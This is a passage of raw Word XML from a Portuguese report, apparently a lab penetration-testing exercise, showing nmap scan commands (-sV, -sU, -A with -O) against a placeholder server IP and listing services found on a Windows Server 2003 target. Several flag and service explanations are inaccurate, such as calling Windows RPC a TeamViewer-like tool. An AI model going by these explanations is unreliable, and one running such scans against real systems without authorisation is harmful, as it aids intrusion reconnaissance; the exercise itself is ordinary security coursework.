          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>municação de aplicativos locais;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001923D7" w:rsidRPr="00F15F82" w:rsidRDefault="00E513AC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923D7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Microsoft Firmware Ppt</w:t>
      </w:r>
      <w:r w:rsidR="001923D7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Protocolo de transferência ponto a ponto.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00751591" w:rsidRDefault="001923D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902307" w:rsidRDefault="0090230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513AC" w:rsidRPr="00F15F82" w:rsidRDefault="00E513AC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F15F82" w:rsidRDefault="00A83EB9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Varredura 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p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00935C82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Utilização do comando:  nmap -sV  -O IP_do_servidor.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E03DD" w:rsidRPr="00F15F82" w:rsidRDefault="00CE03DD" w:rsidP="00630433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“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>nmap” executa a ferramenta Nmap</w:t>
      </w:r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F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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“-sV” permite que a ferramenta realize o SYN e busque a versão do </w:t>
      </w:r>
      <w:r w:rsidR="002A5CE5" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>software rodando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no momento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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“-O” permite que a ferramenta tente encontrar o sistema operacional </w:t>
      </w:r>
      <w:r w:rsidR="009B7BA9" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>utilizado pelo servidor</w:t>
      </w:r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F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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IP_do_servidor informa o IP onde está hospedada a aplicação em teste.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97C78" w:rsidRPr="00F15F82" w:rsidRDefault="00197C78" w:rsidP="00F3154F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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  <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>Resultados esperados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00197C78" w:rsidRPr="00F15F82" w:rsidRDefault="00197C78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  <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pP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>Espera-se descobrir o sistema operacional utilizado pelo servidor explorado, as portas abertas, os serviços e as versões dos softwares que estão rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00197C78" w:rsidRPr="00F15F82" w:rsidRDefault="00197C78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highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E92559" w:rsidRDefault="005967D5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  <w:highlight w:val="cyan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  <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>Relatório de execução</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00197C78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 xml:space="preserve">De acordo com a figura 5, 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foi possível descobrir o sistema operacional utilizado pelo servidor explorado: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>Windows Server 2003.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</w:t>
      </w:r>
      <w:r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>Também foi possível descobrir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as portas abertas, os serviços e a versão dos softwares que estavam rodando nessas portas no momento do escaneamento.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624EB" w:rsidRPr="00F15F82" w:rsidRDefault="00C624EB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68400705" wp14:editId="7B5A452C">
            <wp:extent cx="5400040" cy="3616325"/>
            <wp:effectExtent l="0" t="0" r="0" b="31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5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Figura 5 - Portas escaneadas e versões dos sistemas que elas estavam rodando.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751591" w:rsidP="00F3154F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Serviços</w:t>
      </w:r>
      <w:r w:rsidR="001923D7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="002A5CE5" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="001923D7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ncontrados na figura </w:t>
      </w:r>
      <w:r w:rsidR="00197C78" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5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8C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00E92559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C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Windows RPC </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">- Ferramenta semelhante ao TeamViewer que conecta </w:t>
      </w:r>
      <w:r w:rsidR="002A5CE5" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> computador criando um esquema de servidor - cliente; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00E92559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C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Microsoft Windows microsoft-d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- Ferramenta que auxilia a implantação de imag</w:t>
      </w:r>
      <w:r w:rsidR="00197C78" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ens em uma distribuição Windows;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001923D7" w:rsidRPr="00F15F82" w:rsidRDefault="00E92559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923D7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Apache httpd</w:t>
      </w:r>
      <w:r w:rsidR="00197C78" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Servidor Web;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001923D7" w:rsidRPr="00F15F82" w:rsidRDefault="00E92559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923D7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Microsoft Windows 98 netbios-ssn</w:t>
      </w:r>
      <w:r w:rsidR="001923D7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Api que fornece serviços relacionados com a camada de T</w:t>
      </w:r>
      <w:r w:rsidR="006853AA" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="001923D7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ansporte do modelo OSI para permitir a co</w:t>
      </w:r>
      <w:r w:rsidR="00197C78" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>municação de aplicativos locais;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001923D7" w:rsidRPr="00F15F82" w:rsidRDefault="00E92559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923D7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Microsoft Firmware Ppt</w:t>
      </w:r>
      <w:r w:rsidR="001923D7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Protocolo de transferência ponto a ponto.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A79EE" w:rsidRPr="00F15F82" w:rsidRDefault="008A79EE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02307" w:rsidRDefault="0090230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F15F82" w:rsidRDefault="00A83EB9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Varredura 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4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00935C82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Utilização do comando  nmap -sU -O IP_do_servidor.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A5DFB" w:rsidRPr="00F15F82" w:rsidRDefault="001A5DFB" w:rsidP="00630433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“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>nmap” executa a ferramenta Nmap</w:t>
      </w:r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F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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“-sU” permite que a ferramenta utilize o detector de portas UDP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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“-O” permite que a ferramenta tente encontrar o sistema operacional </w:t>
      </w:r>
      <w:r w:rsidR="00C0198A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>utilizado pelo servidor</w:t>
      </w:r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F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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IP_do_servidor informa o IP onde está hospedada a aplicação em teste.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95ED3" w:rsidRPr="00F15F82" w:rsidRDefault="00E95ED3" w:rsidP="00F3154F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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  <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>Resultados esperados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E95ED3" w:rsidRPr="00F15F82" w:rsidRDefault="00E95ED3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  <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pP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>Espera-se descobrir o sistema operacional utilizado pelo servidor explorado, as portas UDP abertas e os serviços que estão rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E95ED3" w:rsidRPr="00F15F82" w:rsidRDefault="00E95ED3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highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E92559" w:rsidRDefault="005967D5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  <w:highlight w:val="cyan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  <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>Relatório de execução</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E95ED3" w:rsidRPr="00F15F82" w:rsidRDefault="00640C50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>De acordo com a figura 6</w:t>
      </w:r>
      <w:r w:rsidR="00E95ED3"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 xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00E95ED3"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foi possível descobrir o sistema operacional utilizado pelo servidor explorado: </w:t>
      </w:r>
      <w:r w:rsidR="00E95ED3" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>Windows Server 2003.</w:t>
      </w:r>
      <w:r w:rsidR="00E95ED3"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</w:t>
      </w:r>
      <w:r w:rsidR="00E95ED3"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>Também foi possível descobrir</w:t>
      </w:r>
      <w:r w:rsidR="00E95ED3"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as portas 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>UDP abertas e</w:t>
      </w:r>
      <w:r w:rsidR="00E95ED3"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os serviços que estavam rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A5DFB" w:rsidRPr="00F15F82" w:rsidRDefault="001A5DFB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A5DFB" w:rsidRPr="00F15F82" w:rsidRDefault="001A5DFB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lastRenderedPageBreak/>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C624EB" w:rsidRPr="00F15F82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511C9A93" wp14:editId="5162E154">
            <wp:extent cx="5667375" cy="379349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Figura 6 - Portas UDP escaneadas e serviços que estavam rodando nelas no momento do escaneamento.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F4807" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7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Serviços</w:t>
      </w:r>
      <w:r w:rsidR="00B25D43" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> e</w:t>
      </w:r>
      <w:r w:rsidR="003F4807" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ncontrados na </w:t>
      </w:r>
      <w:r w:rsidR="00B25D43" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>figura 6:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="006515FB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C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>netbios-n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- responsável pelo registro de nomes de aplicação do NetBios [4]; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="006515FB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C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>netbios -dgm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- serviço de datagrams do NetBios;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="006515FB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C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>snmp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[5] - gerenciamento de redes;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="006515FB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C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>microsoft-ds</w:t>
      </w:r>
      <w:r w:rsidR="00F5692A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - protocolo utilizado pelo sistema operacional W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indows para compartilhamento e impressões de arquivos; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F5692A" w:rsidRPr="00F15F82" w:rsidRDefault="006515FB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  <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>L2TP</w:t>
      </w:r>
      <w:r w:rsidR="005135D8"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</w:t>
      </w:r>
      <w:r w:rsidR="005135D8" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>(Protocolo de Encapsulamento de C</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>amada 2</w:t>
      </w:r>
      <w:r w:rsidR="005135D8" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00915C31"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[11] </w:t>
      </w:r>
      <w:r w:rsidR="005135D8" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>– Protocolo de encapsulamento da Internet</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7"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, </w:t>
      </w:r>
      <w:r w:rsidR="005135D8"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utilizado por uma conexão de </w:t>
      </w:r>
      <w:r w:rsidR="00F5692A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>VPN</w:t>
      </w:r>
      <w:r w:rsidR="005135D8"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(rede virtual privada) para acessar uma rede privada</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="006515FB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35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C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nat-t-like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- protocolo de tradução de ips.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00F5692A" w:rsidP="0063043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694" w:hanging="21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  </w:t>
      </w:r>
      <w:r w:rsidR="003F4807" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ntp</w:t>
      </w:r>
      <w:r w:rsidR="003F4807" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> [3] - protocolo de sincr</w:t>
      </w:r>
      <w:r w:rsidR="006515FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>onização de relógios usando UDP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3154F" w:rsidRPr="00F15F82" w:rsidRDefault="00A83EB9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Varredura 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p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="006B700D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Utilização do comando nmap -A -O IP_do_servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A5DFB" w:rsidRPr="00F15F82" w:rsidRDefault="001A5DFB" w:rsidP="00935C8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“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>nmap” executa a ferramenta Nmap</w:t>
      </w:r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F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00935C8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“-A” é para usar o Tracerouter na requisição.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00935C8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“-O” permite que a ferramenta tente encontrar o sistema operacional </w:t>
      </w:r>
      <w:r w:rsidR="009B7BA9" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>utilizado pelo servidor</w:t>
      </w:r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F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00935C8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IP_do_servidor informa o IP onde está hospedada a aplicação em teste.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5686A" w:rsidRPr="00F15F82" w:rsidRDefault="0005686A" w:rsidP="00F3154F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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05686A" w:rsidRPr="00F15F82" w:rsidRDefault="0005686A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>Espera-se descobrir o sistema operacional utilizado pelo servidor explorado e traçar a rota da requisição ao servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0005686A" w:rsidRPr="00F15F82" w:rsidRDefault="0005686A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515FB" w:rsidRDefault="005967D5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  <w:highlight w:val="cyan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  <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>Relatório de execução</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A79EE" w:rsidRPr="00F15F82" w:rsidRDefault="0005686A" w:rsidP="006B700D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>De acordo com a</w:t>
      </w:r>
      <w:r w:rsidR="00185ED4"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>s</w:t>
      </w:r>
      <w:r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 xml:space="preserve"> figura</w:t>
      </w:r>
      <w:r w:rsidR="00185ED4"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>s</w:t>
      </w:r>
      <w:r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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005E239F"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>7</w:t>
      </w:r>
      <w:r w:rsidR="00185ED4"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 xml:space="preserve"> e 8</w:t>
      </w:r>
      <w:r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 xml:space="preserve">, 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foi possível descobrir o sistema operacional utilizado pelo servidor explorado: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>Windows Server 2003.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</w:t>
      </w:r>
      <w:r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>Também foi possível descobrir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</w:t>
      </w:r>
      <w:r w:rsidR="005E239F" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>a rota traçada para a requisição ao servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A79EE" w:rsidRPr="00F15F82" w:rsidRDefault="006B700D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2340BC27" wp14:editId="057EE7C2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>262890</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>260985</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5019675" cy="3475355"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21430"/>
                <wp:lineTo x="21559" y="21430"/>
                <wp:lineTo x="21559" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight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7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Figura 7 - Rota traçada pelo Tracerouter - Parte 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530877" w:rsidRPr="00F15F82" w:rsidRDefault="00BF5785" w:rsidP="00F3154F">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1415" w:firstLine="1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lastRenderedPageBreak/>
        <w:t>Serviços e</w:t>
      </w:r>
      <w:r w:rsidR="00530877" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ncontrados na figura </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
